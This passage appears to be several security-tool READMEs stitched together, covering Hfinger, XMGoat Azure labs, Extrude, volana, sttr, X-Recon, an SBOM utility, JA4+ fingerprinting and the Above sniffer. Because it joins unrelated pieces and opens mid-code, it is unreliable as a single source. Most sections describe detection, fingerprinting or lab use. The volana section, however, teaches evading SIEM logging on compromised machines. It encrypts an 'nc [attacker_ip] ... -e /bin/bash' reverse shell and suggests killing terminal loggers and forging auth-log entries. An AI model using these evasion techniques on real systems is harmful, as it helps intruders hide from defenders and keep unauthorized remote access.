print(hfinger_analyze(pcap_path, reporting_mode))
Beginning with version `0.2.1`, Hfinger uses the `logging` module for logging information about encountered non-standard values of headers, non-ASCII characters in the non-payload part of the request, lack of CRLF tags (`\r\n\r\n`), and other problems with analyzed requests that are not application errors. Hfinger creates its own logger using the name `hfinger`, but without prior configuration, log information is in practice discarded. If you want to receive this log information, before calling `hfinger_analyze` you should configure the `hfinger` logger, set the log level to `logging.INFO`, configure a log handler to your needs, and add it to the logger. More information is available in the `hfinger_analyze` function docstring.
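For example, a minimal sketch of that configuration (assuming a pcap file named `traffic.pcap`) could look like this:

```python
import logging
from hfinger.analysis import hfinger_analyze

# Configure the "hfinger" logger before calling hfinger_analyze,
# otherwise its log records are effectively discarded.
logger = logging.getLogger("hfinger")
logger.setLevel(logging.INFO)
handler = logging.StreamHandler()  # or logging.FileHandler("hfinger.log")
handler.setFormatter(logging.Formatter("%(levelname)s: %(message)s"))
logger.addHandler(handler)

results = hfinger_analyze("traffic.pcap", 2)  # 2 is the default report mode
print(results)
```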
A fingerprint is based on features extracted from a request. Usage of particular features from the full list depends on the chosen report mode from a predefined list (more information on report modes is here). The figure below represents the creation of an exemplary fingerprint in the default report mode.
Three parts of the request are analyzed to extract information: the URI, the headers' structure (including method and protocol version), and the payload. Particular features of the fingerprint are separated using `|` (pipe). The final fingerprint generated for the `POST` request from the example is:
2|3|1|php|0.6|PO|1|us-ag,ac,ac-en,ho,co,co-ty,co-le|us-ag:f452d7a9/ac:as-as/ac-en:id/co:Ke-Al/co-ty:te-pl|A|4|1.4
The creation of features is described below in the order of appearance in the fingerprint.
Firstly, URI features are extracted:
* URI length, represented as a logarithm base 10 of the length, rounded to an integer (in the example the URI is 43 characters long, so log10(43) ≈ 2),
* number of directories (in the example there are 3 directories),
* average directory length, represented as a logarithm base 10 of the actual average length of the directories, rounded to an integer (in the example there are three directories with a total length of 20 characters (6+6+8), so log10(20/3) ≈ 1),
* extension of the requested file, but only if it is on the list of known extensions in `hfinger/configs/extensions.txt`,
* average value length, represented as a logarithm base 10 of the actual average value length, rounded to one decimal point (in the example both values have the same length of 4 characters, so the average is 4 and log10(4) ≈ 0.6).
Secondly, header structure features are analyzed:
* request method, encoded as the first two letters of the method (`PO`),
* protocol version, encoded as an integer (1 for version 1.1, 0 for version 1.0, and 9 for version 0.9),
* order of the headers,
* and popular headers and their values.
To represent the order of the headers in the request, each header's name is encoded according to the schema in `hfinger/configs/headerslow.json`; for example, the `User-Agent` header is encoded as `us-ag`. Encoded names are separated by `,`. If the header name does not start with an upper case letter (or any of its parts when analyzing compound headers such as `Accept-Encoding`), then the encoded representation is prefixed with `!`. If the header name is not on the list of known headers, it is hashed using the FNV1a hash, and the hash is used as the encoding.
When analyzing popular headers, the request is checked for their presence. These headers are:
* Connection
* Accept-Encoding
* Content-Encoding
* Cache-Control
* TE
* Accept-Charset
* Content-Type
* Accept
* Accept-Language
* User-Agent
When a header is found in the request, its value is checked against a table of typical values to create pairs of `header_name_representation:value_representation`. The name of the header is encoded according to the schema in `hfinger/configs/headerslow.json` (as presented before), and the value is encoded according to the schema stored in the `hfinger/configs` directory or the `configs.py` file, depending on the header. In the above example, `Accept` is encoded as `ac` and its value `*/*` as `as-as` (`asterisk-asterisk`), giving `ac:as-as`. The pairs are inserted into the fingerprint in order of appearance in the request and are delimited using `/`. If the header value cannot be found in the encoding table, it is hashed using the FNV1a hash.
If the header value is composed of multiple values, they are tokenized to provide a list of values delimited with `,`; for example, `Accept: */*, text/*` would give `ac:as-as,te-as`. However, at this point of development, if the header value contains a "quality value" tag (`q=`), then the whole value is encoded with its FNV1a hash. Finally, the values of the User-Agent and Accept-Language headers are directly encoded using their FNV1a hashes.
Finally, the payload features:
* presence of non-ASCII characters, represented with the letter `N`, and with `A` otherwise,
* payload's Shannon entropy, rounded to an integer,
* and payload length, represented as a logarithm base 10 of the actual payload length, rounded to one decimal point.
`Hfinger` operates in five report modes, which differ in the features represented in the fingerprint, and thus in the information extracted from requests. These are (with the number used in the tool configuration):
* mode `0` - producing a similar number of collisions and fingerprints as mode `2`, but using fewer features,
* mode `1` - representing all designed features, but producing a little more collisions than modes `0`, `2`, and `4`,
* mode `2` - optimal (the default mode), representing all features which are usually used during requests' analysis, but also offering a low number of collisions and generated fingerprints,
* mode `3` - producing the lowest number of generated fingerprints of all modes, but achieving the highest number of collisions,
* mode `4` - offering the highest fingerprint entropy, but also generating slightly more fingerprints than modes `0`-`2`.
The modes were chosen in order to optimize Hfinger's capability to uniquely identify malware families versus the number of generated fingerprints. Modes `0`, `2`, and `4` offer a similar number of collisions between malware families; however, mode `4` generates a little more fingerprints than the other two. Mode `2` represents more request features than mode `0` with a comparable number of generated fingerprints and collisions. Mode `1` is the only one representing all designed features, but it increases the number of collisions by almost two times compared to modes `0`, `2`, and `4`. Mode `3` produces at least two times fewer fingerprints than the other modes, but it introduces about nine times more collisions. A description of all designed features is here.
The modes consist of the following features (in the order of appearance in the fingerprint):
* mode `0`:
  * number of directories,
  * average directory length represented as an integer,
  * extension of the requested file,
  * average value length represented as a float,
  * order of headers,
  * popular headers and their values,
  * payload length represented as a float.
* mode `1`:
  * URI length represented as an integer,
  * number of directories,
  * average directory length represented as an integer,
  * extension of the requested file,
  * variable length represented as an integer,
  * number of variables,
  * average value length represented as an integer,
  * request method,
  * version of protocol,
  * order of headers,
  * popular headers and their values,
  * presence of non-ASCII characters,
  * payload entropy represented as an integer,
  * payload length represented as an integer.
* mode `2`:
  * URI length represented as an integer,
  * number of directories,
  * average directory length represented as an integer,
  * extension of the requested file,
  * average value length represented as a float,
  * request method,
  * version of protocol,
  * order of headers,
  * popular headers and their values,
  * presence of non-ASCII characters,
  * payload entropy represented as an integer,
  * payload length represented as a float.
* mode `3`:
  * URI length represented as an integer,
  * average directory length represented as an integer,
  * extension of the requested file,
  * average value length represented as an integer,
  * order of headers.
* mode `4`:
  * URI length represented as a float,
  * number of directories,
  * average directory length represented as a float,
  * extension of the requested file,
  * variable length represented as a float,
  * average value length represented as a float,
  * request method,
  * version of protocol,
  * order of headers,
  * popular headers and their values,
  * presence of non-ASCII characters,
  * payload entropy represented as a float,
  * payload length represented as a float.
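To make the default-mode layout concrete, the following small sketch splits the example fingerprint shown earlier on `|` and pairs each field with the mode `2` feature names listed above (labels shortened slightly):

```python
MODE_2_FIELDS = [
    "URI length", "number of directories", "average directory length",
    "extension of the requested file", "average value length",
    "request method", "protocol version", "order of headers",
    "popular headers and their values", "non-ASCII characters present",
    "payload entropy", "payload length",
]

example = ("2|3|1|php|0.6|PO|1|us-ag,ac,ac-en,ho,co,co-ty,co-le|"
           "us-ag:f452d7a9/ac:as-as/ac-en:id/co:Ke-Al/co-ty:te-pl|A|4|1.4")

# Each pipe-separated field corresponds to one mode 2 feature, in order.
for name, value in zip(MODE_2_FIELDS, example.split("|")):
    print(f"{name:35s} {value}")
```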
XM Goat is composed of XM Cyber terraform templates that help you learn about common Azure security issues. Each template is a vulnerable environment, with some significant misconfigurations. Your job is to attack and compromise the environments.
Here's what to do for each environment:
Run installation and then get started.
With the initial user and service principal credentials, attack the environment based on the scenario flow (for example, XMGoat/scenarios/scenario_1/scenario1_flow.png).
If you need help with your attack, refer to the solution (for example, XMGoat/scenarios/scenario_1/solution.md).
When you're done learning the attack, clean up.
Run these commands:
$ az login
$ git clone https://github.com/XMCyber/XMGoat.git
$ cd XMGoat
$ cd scenarios
$ cd scenario_<SCENARIO>
Where <SCENARIO> is the scenario number you want to complete
$ terraform init
$ terraform plan -out <FILENAME>
$ terraform apply <FILENAME>
Where <FILENAME> is the name of the output file
To get the initial user and service principal credentials, run the following query:
$ terraform output --json
For Service Principals, use application_id.value and application_secret.value.
For Users, use username.value and password.value.
After completing the scenario, run the following command in order to clean all the resources created in your tenant
$ az login
$ cd XMGoat
$ cd scenarios
$ cd scenario_<SCENARIO>
Where <SCENARIO> is the scenario number you want to complete
$ terraform destroy
Analyse binaries for missing security features, information disclosure and more.
Extrude is in the early stages of development, and currently only supports ELF and MachO binaries. PE (Windows) binaries will be supported soon.
Usage:
extrude [flags] [file]
Flags:
-a, --all Show details of all tests, not just those which failed.
-w, --fail-on-warning Exit with a non-zero status even if only warnings are discovered.
-h, --help help for extrude
You can optionally run extrude with docker via:
docker run -v `pwd`:/blah -it ghcr.io/liamg/extrude /blah/targetfile
Coming soon...
During a pentest, an important aspect is to be stealthy. For this reason you should clear your tracks after your passage. Nevertheless, many infrastructures log commands and send them to a SIEM in real time, making the after-the-fact cleaning part alone useless. `volana` provides a simple way to hide commands executed on a compromised machine by providing its own shell runtime (enter your command, volana executes it for you). This way you clear your tracks DURING your passage.
You need to get an interactive shell (find a way to spawn it, you are a hacker, it's your job!). Then download volana on the target machine and launch it. That's it, now you can type the commands you want to be stealthily executed.
## Download it from github release
## If you do not have internet access from compromised machine, find another way
curl -LO https://github.com/ariary/volana/releases/latest/download/volana
## Execute it
./volana
## You are now under the radar
volana Β» echo "Hi SIEM team! Do you find me?" > /dev/null 2>&1 #you are allowed to be a bit cocky
volana Β» [command]
Keywords for the volana console:
* `ring`: enable ring mode, i.e. each command is launched along with plenty of others to cover tracks (against solutions that monitor system calls)
* `exit`: exit the volana console
Imagine you have a non-interactive shell (webshell or blind RCE); you could use the `encrypt` and `decrypt` subcommands. Beforehand, you need to build `volana` with an embedded encryption key.
On attacker machine
## Build volana with encryption key
make build.volana-with-encryption
## Transfer it on TARGET (the unique detectable command)
## [...]
## Encrypt the command you want to stealthy execute
## (Here a nc bindshell to obtain a interactive shell)
volana encr "nc [attacker_ip] [attacker_port] -e /bin/bash"
>>> ENCRYPTED COMMAND
Copy the encrypted command and execute it with your RCE on the target machine:
./volana decr [encrypted_command]
## Now you have a bindshell, spawn it to make it interactive and use volana as usual to stay stealthy (./volana). + Don't forget to remove the volana binary before leaving (because the decryption key can easily be retrieved from it)
Why not just hide the command with `echo [command] | base64` and decode it on the target with `echo [encoded_command] | base64 -d | bash`? Because we want to be protected against systems that trigger an alert on `base64` use or that look for base64 text in commands. We also want to make investigation difficult, and base64 isn't a real brake.
Keep in mind that `volana` is not a miracle that will make you totally invisible. Its aim is to make intrusion detection and investigation harder. By "detected" we mean whether an alert can be triggered when a certain command has been executed.
Only the `volana` launching command line will be caught. However, by adding a space before executing it, the default bash behavior is to not save it.

Other places where commands may be recorded, and possible counter-measures:
* shell history files (`.bash_history`, `.zsh_history`, etc.)
* system call monitoring tools (e.g. `opensnoop`)
* terminal loggers (`script`, `screen -L`, `sexonthebash`, `ovh-ttyrec`, etc.) => `pkill -9 script`; `screen` is a bit more difficult to avoid, however it does not register input (secret input: `stty -echo` => avoid), or use `volana` with encryption
* authentication logs (`/var/log/auth.log`) for `sudo` or `su` commands => `logger -p auth.info "No hacker is poisoning your syslog solution, don't worry"`
* `LD_PRELOAD` injection to make logs

Sorry for the clickbait title, but no money will be provided for contributors.
Let me know if you have found:
* a way to detect `volana`
* a way to spy on the console that doesn't detect `volana` commands
* a way to avoid a detection system
`sttr` is a command line tool that allows you to quickly run various transformation operations on a string.
// With input prompt
sttr
// Direct input
sttr md5 "Hello World"
// File input
sttr md5 file.text
sttr base64-encode image.jpg
// Reading from different processor like cat, curl, printf etc..
echo "Hello World" | sttr md5
cat file.txt | sttr md5
// Writing output to a file
sttr yaml-json file.yaml > file-output.json
You can run the below `curl` to install it somewhere in your PATH for easy use. Ideally it will be installed in the `./bin` folder.
curl -sfL https://raw.githubusercontent.com/abhimanyu003/sttr/main/install.sh | sh
curl -sS https://webi.sh/sttr | sh
curl.exe https://webi.ms/sttr | powershell
See here
If you are on macOS and using Homebrew, you can install `sttr` with the following:
brew tap abhimanyu003/sttr
brew install sttr
sudo snap install sttr
yay -S sttr-bin
scoop bucket add sttr https://github.com/abhimanyu003/scoop-bucket.git
scoop install sttr
go install github.com/abhimanyu003/sttr@latest
Download the pre-compiled binaries from the Release! page and copy them to the desired location.
You can use the `sttr` command.

// For interactive menu
sttr
// Provide your input
// Press enter twice to open the operation menu
// Press `/` to filter various operations.
// You can also press the UP/DOWN arrows to select various operations.
sttr -h
// Example
sttr zeropad -h
sttr md5 -h
sttr {command-name} {filename}
sttr base64-encode image.jpg
sttr md5 file.txt
sttr md-html Readme.md
sttr yaml-json file.yaml > file-output.json
curl https://jsonplaceholder.typicode.com/users | sttr json-yaml
sttr md5 hello | sttr base64-encode
echo "Hello World" | sttr base64-encode | sttr md5
These are a few locations where `sttr` was highlighted; many thanks to all of you. Please feel free to add any blogs/videos you may have made that discuss `sttr` to the list.
Retrieves relevant subdomains for the target website and consolidates them into a whitelist. These subdomains can be utilized during the scraping process.
Site-wide Link Discovery:
Collects all links throughout the website based on the provided whitelist and the specified max_depth
.
Form and Input Extraction:
Identifies all forms and inputs found within the extracted links, generating a JSON output. This JSON output serves as a foundation for leveraging the XSS scanning capability of the tool.
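As a rough illustration of what that form-and-input discovery step involves (a hypothetical sketch using `requests` and `BeautifulSoup`, not the tool's actual code), a single page could be processed like this:

```python
import json
import requests
from bs4 import BeautifulSoup

def extract_forms(url: str):
    """Collect forms and their inputs from a single page."""
    html = requests.get(url, timeout=10).text
    soup = BeautifulSoup(html, "html.parser")
    forms = []
    for form in soup.find_all("form"):
        forms.append({
            "action": form.get("action", ""),
            "method": form.get("method", "get"),
            "inputs": [
                {"name": field.get("name"), "type": field.get("type", "text")}
                for field in form.find_all("input")
            ],
        })
    return forms

if __name__ == "__main__":
    target = "http://testphp.vulnweb.com"
    print(json.dumps({target: extract_forms(target)}, indent=2))
```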
XSS Scanning:
Note:
The scanning functionality is currently inactive on SPA (Single Page Application) web applications, and we have only tested it on websites developed with PHP, yielding remarkable results. In the future, we plan to incorporate these features into the tool.
Note: This tool maintains an up-to-date list of file extensions that it skips during the exploration process. The default list includes common file types such as images, stylesheets, and scripts (`".css", ".js", ".mp4", ".zip", ".png", ".svg", ".jpeg", ".webp", ".jpg", ".gif"`). You can customize this list to better suit your needs by editing the setting.json file.
$ git clone https://github.com/joshkar/X-Recon
$ cd X-Recon
$ python3 -m pip install -r requirements.txt
$ python3 xr.py
You can use this address in the Get URL section
http://testphp.vulnweb.com
This is a simple SBOM utility which aims to provide an insider view of which packages are getting executed.
The process and objective are simple: we can get a clear perspective on the packages installed by APT (currently working on implementing this for RPM and other package managers). This is mainly needed to check which packages are actually being executed.
The packages needed are mentioned in the `requirements.txt` file and can be installed using pip:
pip3 install -r requirements.txt
Mount the image:
Currently I am still working on a mechanism to automatically define a mount point and mount different types of images and volumes, but it's still quite a task for me.

| Argument | Description |
|---|---|
| `--analysis-mode` | Specifies the mode of operation. Default is `static`. Choices are `static` and `chroot`. |
| `--static-type` | Specifies the type of analysis for static mode. Required for static mode only. Choices are `info` and `service`. |
| `--volume-path` | Specifies the path to the mounted volume. Default is `/mnt`. |
| `--save-file` | Specifies the output file for JSON output. |
| `--info-graphic` | Specifies whether to generate visual plots for CHROOT analysis. Default is `True`. |
| `--pkg-mgr` | Manually specify the package manager, or omit this option for automatic detection. |

APT:

- Static Info Analysis:
  - This command runs the program in static analysis mode, specifically using the Info Directory analysis method.
  - It analyzes the packages installed on the mounted volume located at `/mnt`.
  - It saves the output in a JSON file named `output.json`.
  - It generates visual plots for CHROOT analysis.
```bash
python3 main.py --pkg-mgr apt --analysis-mode static --static-type info --volume-path /mnt --save-file output.json
```
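As a rough, hypothetical illustration of what an "info" style static scan of a Debian-based image involves (this is not the tool's actual code), the dpkg status database on the mounted volume can be parsed directly:

```python
import json

VOLUME = "/mnt"  # mounted image, as in the command above

packages, current = [], {}
with open(f"{VOLUME}/var/lib/dpkg/status") as status_file:
    for line in status_file:
        if not line.strip():                 # blank line ends a package stanza
            if current:
                packages.append(current)
                current = {}
        elif ":" in line and not line.startswith(" "):
            key, _, value = line.partition(":")
            current[key.strip()] = value.strip()
if current:
    packages.append(current)

installed = [p for p in packages if "installed" in p.get("Status", "")]
print(json.dumps(
    [{"name": p.get("Package"), "version": p.get("Version")} for p in installed],
    indent=2,
))
```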
- Static Service Analysis:
  - This command runs the program in static analysis mode, specifically using the Service file analysis method.
  - It analyzes the packages installed on the mounted volume located at `/custom_mount`.
  - It saves the output in a JSON file named `output.json`.
  - It does not generate visual plots for CHROOT analysis.

```bash
python3 main.py --pkg-mgr apt --analysis-mode static --static-type service --volume-path /custom_mount --save-file output.json --info-graphic False
```
- Chroot analysis with or without graphic output:
  - It analyzes the packages installed on the mounted volume located at `/mnt`.
  - It saves the output in a JSON file named `output.json`.
  - Set `--info-graphic` to `True` for visual plots, else `False`.

```bash
python3 main.py --pkg-mgr apt --analysis-mode chroot --volume-path /mnt --save-file output.json --info-graphic True/False
```
RPM:

- Static Analysis:
  - Similar to how it's done on APT, but there is only one type of static scan available for now.

```bash
python3 main.py --pkg-mgr rpm --analysis-mode static --volume-path /mnt --save-file output.json
```

- Chroot Analysis:

```bash
python3 main.py --pkg-mgr rpm --analysis-mode chroot --volume-path /mnt --save-file output.json --info-graphic True/False
```
Currently the tool works on Debian and Red Hat based images. I can guarantee the Debian outputs, but the Red Hat ones still need work; it's not perfect yet.
I am working on the pacman side of things and am trying to find a reliable way of accessing the pacman DB for static analysis.
For the workings and process related documentation please read the wiki page: Link
Ideas regarding this topic are welcome in the discussions page.
JA4+ is a suite of network fingerprinting methods that are easy to use and easy to share. These methods are both human and machine readable to facilitate more effective threat-hunting and analysis. The use-cases for these fingerprints include scanning for threat actors, malware detection, session hijacking prevention, compliance automation, location tracking, DDoS detection, grouping of threat actors, reverse shell detection, and many more.
Please read our blogs for details on how JA4+ works, why it works, and examples of what can be detected/prevented with it:
JA4+ Network Fingerprinting (JA4/S/H/L/X/SSH)
JA4T: TCP Fingerprinting (JA4T/TS/TScan)
To understand how to read JA4+ fingerprints, see Technical Details
This repo includes JA4+ Python, Rust, Zeek and C, as a Wireshark plugin.
JA4/JA4+ support is being added to:
GreyNoise
Hunt
Driftnet
DarkSail
Arkime
GoLang (JA4X)
Suricata
Wireshark
Zeek
nzyme
Netresec's CapLoader
NetworkMiner">Netresec's NetworkMiner
NGINX
F5 BIG-IP
nfdump
ntop's ntopng
ntop's nDPI
Team Cymru
NetQuest
Censys
Exploit.org's Netryx
Cloudflare
fastly
with more to be announced...
| Application | JA4+ Fingerprints |
|---|---|
| Chrome | JA4=t13d1516h2_8daaf6152771_02713d6af862 (TCP) JA4=q13d0312h3_55b375c5d22e_06cda9e17597 (QUIC) JA4=t13d1517h2_8daaf6152771_b0da82dd1658 (pre-shared key) JA4=t13d1517h2_8daaf6152771_b1ff8ab2d16f (no key) |
| IcedID Malware Dropper | JA4H=ge11cn020000_9ed1ff1f7b03_cd8dafe26982 |
| IcedID Malware | JA4=t13d201100_2b729b4bf6f3_9e7b989ebec8 JA4S=t120300_c030_5e2616a54c73 |
| Sliver Malware | JA4=t13d190900_9dc949149365_97f8aa674fd9 JA4S=t130200_1301_a56c5b993250 JA4X=000000000000_4f24da86fad6_bf0f0589fc03 JA4X=000000000000_7c32fa18c13e_bf0f0589fc03 |
| Cobalt Strike | JA4H=ge11cn060000_4e59edc1297a_4da5efaf0cbd JA4X=2166164053c1_2166164053c1_30d204a01551 |
| SoftEther VPN | JA4=t13d880900_fcb5b95cb75a_b0d3b4ac2a14 (client) JA4S=t130200_1302_a56c5b993250 JA4X=d55f458d5a6c_d55f458d5a6c_0fc8c171b6ae |
| Qakbot | JA4X=2bab15409345_af684594efb4_000000000000 |
| Pikabot | JA4X=1a59268f55e5_1a59268f55e5_795797892f9c |
| Darkgate | JA4H=po10nn060000_cdb958d032b0 |
| LummaC2 | JA4H=po11nn050000_d253db9d024b |
| Evilginx | JA4=t13d191000_9dc949149365_e7c285222651 |
| Reverse SSH Shell | JA4SSH=c76s76_c71s59_c0s70 |
| Windows 10 | JA4T=64240_2-1-3-1-1-4_1460_8 |
| Epson Printer | JA4TScan=28960_2-4-8-1-3_1460_3_1-4-8-16 |
For more, see ja4plus-mapping.csv
The mapping file is unlicensed and free to use. Feel free to do a pull request with any JA4+ data you find.
Recommended to have tshark version 4.0.6 or later for full functionality. See: https://pkgs.org/search/?q=tshark
Download the latest JA4 binaries from: Releases.
sudo apt install tshark
./ja4 [options] [pcap]
1) Install Wireshark https://www.wireshark.org/download.html which will install tshark 2) Add tshark to $PATH
ln -s /Applications/Wireshark.app/Contents/MacOS/tshark /usr/local/bin/tshark
./ja4 [options] [pcap]
1) Install Wireshark for Windows from https://www.wireshark.org/download.html which will install tshark.exe
tshark.exe is at the location where Wireshark is installed, for example: C:\Program Files\Wireshark\tshark.exe
2) Add the location of tshark to your "PATH" environment variable in Windows.
(System properties > Environment Variables... > Edit Path)
3) Open cmd, navigate the ja4 folder
ja4 [options] [pcap]
An official JA4+ database of fingerprints, associated applications and recommended detection logic is in the process of being built.
In the meantime, see ja4plus-mapping.csv
Feel free to do a pull request with any JA4+ data you find.
JA4+ is a set of simple yet powerful network fingerprints for multiple protocols that are both human and machine readable, facilitating improved threat-hunting and security analysis. If you are unfamiliar with network fingerprinting, I encourage you to read my blogs releasing JA3 here, JARM here, and this excellent blog by Fastly on the State of TLS Fingerprinting which outlines the history of the aforementioned along with their problems. JA4+ brings dedicated support, keeping the methods up-to-date as the industry changes.
All JA4+ fingerprints have an a_b_c format, delimiting the different sections that make up the fingerprint. This allows for hunting and detection utilizing just ab or ac or c only. If one wanted to just do analysis on incoming cookies into their app, they would look at JA4H_c only. This new locality-preserving format facilitates deeper and richer analysis while remaining simple, easy to use, and allowing for extensibility.
For example, GreyNoise is an internet listener that identifies internet scanners and is implementing JA4+ into their product. They have an actor who scans the internet with a constantly changing single TLS cipher. This generates a massive amount of completely different JA3 fingerprints, but with JA4, only the b part of the JA4 fingerprint changes; parts a and c remain the same. As such, GreyNoise can track the actor by looking at the JA4_ac fingerprint (joining a+c, dropping b).
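As a small illustration of that locality-preserving a_b_c layout, the sketch below splits a JA4 string into its sections and joins a+c for the kind of JA4_ac matching described (using the Chrome example value from the table above):

```python
def ja4_parts(fingerprint: str):
    # JA4+ fingerprints use an a_b_c layout, so splitting on "_" yields the sections.
    a, b, c = fingerprint.split("_")
    return a, b, c

chrome_ja4 = "t13d1516h2_8daaf6152771_02713d6af862"  # example value from the table above
a, b, c = ja4_parts(chrome_ja4)
ja4_ac = f"{a}_{c}"  # drop the b section to track actors that rotate only ciphers
print(ja4_ac)        # t13d1516h2_02713d6af862
```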
Current methods and implementation details:
| Full Name | Short Name | Description |
|---|---|---|
| JA4 | JA4 | TLS Client Fingerprinting |
| JA4Server | JA4S | TLS Server Response / Session Fingerprinting |
| JA4HTTP | JA4H | HTTP Client Fingerprinting |
| JA4Latency | JA4L | Latency Measurement / Light Distance |
| JA4X509 | JA4X | X509 TLS Certificate Fingerprinting |
| JA4SSH | JA4SSH | SSH Traffic Fingerprinting |
| JA4TCP | JA4T | TCP Client Fingerprinting |
| JA4TCPServer | JA4TS | TCP Server Response Fingerprinting |
| JA4TCPScan | JA4TScan | Active TCP Fingerprint Scanner |
The full name or short name can be used interchangeably. Additional JA4+ methods are in the works...
To understand how to read JA4+ fingerprints, see Technical Details
JA4: TLS Client Fingerprinting is open-source, BSD 3-Clause, same as JA3. FoxIO does not have patent claims and is not planning to pursue patent coverage for JA4 TLS Client Fingerprinting. This allows any company or tool currently utilizing JA3 to immediately upgrade to JA4 without delay.
JA4S, JA4L, JA4H, JA4X, JA4SSH, JA4T, JA4TScan and all future additions, (collectively referred to as JA4+) are licensed under the FoxIO License 1.1. This license is permissive for most use cases, including for academic and internal business purposes, but is not permissive for monetization. If, for example, a company would like to use JA4+ internally to help secure their own company, that is permitted. If, for example, a vendor would like to sell JA4+ fingerprinting as part of their product offering, they would need to request an OEM license from us.
All JA4+ methods are patent pending.
JA4+ is a trademark of FoxIO
JA4+ can and is being implemented into open source tools, see the License FAQ for details.
This licensing allows us to provide JA4+ to the world in a way that is open and immediately usable, but also provides us with a way to fund continued support, research into new methods, and the development of the upcoming JA4 Database. We want everyone to have the ability to utilize JA4+ and are happy to work with vendors and open source projects to help make that happen.
ja4plus-mapping.csv is not included in the above software licenses and is thereby a license-free file.
Q: Why are you sorting the ciphers? Doesn't the ordering matter?
A: It does but in our research we've found that applications and libraries choose a unique cipher list more than unique ordering. This also reduces the effectiveness of "cipher stunting," a tactic of randomizing cipher ordering to prevent JA3 detection.
Q: Why are you sorting the extensions?
A: Earlier in 2023, Google updated Chromium browsers to randomize their extension ordering. Much like cipher stunting, this was a tactic to prevent JA3 detection and "make the TLS ecosystem more robust to changes." Google was worried server implementers would assume the Chrome fingerprint would never change and end up building logic around it, which would cause issues whenever Google went to update Chrome.
So I want to make this clear: JA4 fingerprints will change as application TLS libraries are updated, about once a year. Do not assume fingerprints will remain constant in an environment where applications are updated. In any case, sorting the extensions gets around this and adding in Signature Algorithms preserves uniqueness.
Q: Doesn't TLS 1.3 make fingerprinting TLS clients harder?
A: No, it makes it easier! Since TLS 1.3, clients have had a much larger set of extensions and even though TLS1.3 only supports a few ciphers, browsers and applications still support many more.
John Althouse, with feedback from:
Josh Atkins
Jeff Atkinson
Joshua Alexander
W.
Joe Martin
Ben Higgins
Andrew Morris
Chris Ueland
Ben Schofield
Matthias Vallentin
Valeriy Vorotyntsev
Timothy Noel
Gary Lipsky
And engineers working at GreyNoise, Hunt, Google, ExtraHop, F5, Driftnet and others.
Contact John Althouse at john@foxio.io for licensing and questions.
Copyright (c) 2024, FoxIO
Invisible protocol sniffer for finding vulnerabilities in the network. Designed for pentesters and security engineers.
Above: Invisible network protocol sniffer
Designed for pentesters and security engineers
Author: Magama Bazarov, <caster@exploit.org>
Pseudonym: Caster
Version: 2.6
Codename: Introvert
All information contained in this repository is provided for educational and research purposes only. The author is not responsible for any illegal use of this tool.
It is a specialized network security tool that helps both pentesters and security professionals.
Above is an invisible network sniffer for finding vulnerabilities in network equipment. It is based entirely on network traffic analysis, so it does not make any noise on the air. It's invisible. It is completely based on the Scapy library.
Above allows pentesters to automate the process of finding vulnerabilities in network hardware. Discovery protocols, dynamic routing, 802.1Q, ICS Protocols, FHRP, STP, LLMNR/NBT-NS, etc.
Detects up to 27 protocols:
MACSec (802.1X AE)
EAPOL (Checking 802.1X versions)
ARP (Passive ARP, Host Discovery)
CDP (Cisco Discovery Protocol)
DTP (Dynamic Trunking Protocol)
LLDP (Link Layer Discovery Protocol)
802.1Q Tags (VLAN)
S7COMM (Siemens)
OMRON
TACACS+ (Terminal Access Controller Access Control System Plus)
ModbusTCP
STP (Spanning Tree Protocol)
OSPF (Open Shortest Path First)
EIGRP (Enhanced Interior Gateway Routing Protocol)
BGP (Border Gateway Protocol)
VRRP (Virtual Router Redundancy Protocol)
HSRP (Hot Standby Router Protocol)
GLBP (Gateway Load Balancing Protocol)
IGMP (Internet Group Management Protocol)
LLMNR (Link Local Multicast Name Resolution)
NBT-NS (NetBIOS Name Service)
MDNS (Multicast DNS)
DHCP (Dynamic Host Configuration Protocol)
DHCPv6 (Dynamic Host Configuration Protocol v6)
ICMPv6 (Internet Control Message Protocol v6)
SSDP (Simple Service Discovery Protocol)
MNDP (MikroTik Neighbor Discovery Protocol)
Above works in two modes: live sniffing on a network interface, and offline analysis of an existing traffic dump.
The tool is very simple in its operation and is driven by arguments:
* it can take a `.pcap` file as input and look for protocols in it,
* it can record the sniffed traffic to a `.pcap` file whose name you specify yourself.
options:
-h, --help show this help message and exit
--interface INTERFACE
Interface for traffic listening
--timer TIMER Time in seconds to capture packets, if not set capture runs indefinitely
--output OUTPUT File name where the traffic will be recorded
--input INPUT File name of the traffic dump
--passive-arp Passive ARP (Host Discovery)
The information obtained will be useful not only to the pentester but also to the security engineer, who will know what to pay attention to.
When Above detects a protocol, it outputs the necessary information to indicate the attack vector or security issue:
Impact: What kind of attack can be performed on this protocol;
Tools: What tool can be used to launch an attack;
Technical information: Required information for the pentester, sender MAC/IP addresses, FHRP group IDs, OSPF/EIGRP domains, etc.
Mitigation: Recommendations for fixing the security problems
Source/Destination Addresses: For protocols, Above displays information about the source and destination MAC addresses and IP addresses
You can install Above directly from the Kali Linux repositories
caster@kali:~$ sudo apt update && sudo apt install above
Or...
caster@kali:~$ sudo apt-get install python3-scapy python3-colorama python3-setuptools
caster@kali:~$ git clone https://github.com/casterbyte/Above
caster@kali:~$ cd Above/
caster@kali:~/Above$ sudo python3 setup.py install
# Install python3 first
brew install python3
# Then install required dependencies
sudo pip3 install scapy colorama setuptools
# Clone the repo
git clone https://github.com/casterbyte/Above
cd Above/
sudo python3 setup.py install
Don't forget to deactivate your firewall on macOS!
Above requires root access for sniffing
Above can be run with or without a timer:
caster@kali:~$ sudo above --interface eth0 --timer 120
To stop traffic sniffing, press CTRL + C
WARNING! Above is not designed to work with tunnel interfaces (L3) due to the use of filters for L2 protocols. The tool may not work properly on tunneled L3 interfaces.
Example:
caster@kali:~$ sudo above --interface eth0 --timer 120
-----------------------------------------------------------------------------------------
[+] Start sniffing...
[*] After the protocol is detected - all necessary information about it will be displayed
--------------------------------------------------
[+] Detected SSDP Packet
[*] Attack Impact: Potential for UPnP Device Exploitation
[*] Tools: evil-ssdp
[*] SSDP Source IP: 192.168.0.251
[*] SSDP Source MAC: 02:10:de:64:f2:34
[*] Mitigation: Ensure UPnP is disabled on all devices unless absolutely necessary, monitor UPnP traffic
--------------------------------------------------
[+] Detected MDNS Packet
[*] Attack Impact: MDNS Spoofing, Credentials Interception
[*] Tools: Responder
[*] MDNS Spoofing works specifically against Windows machines
[*] You cannot get NetNTLMv2-SSP from Apple devices
[*] MDNS Speaker IP: fe80::183f:301c:27bd:543
[*] MDNS Speaker MAC: 02:10:de:64:f2:34
[*] Mitigation: Filter MDNS traffic. Be careful with MDNS filtering
--------------------------------------------------
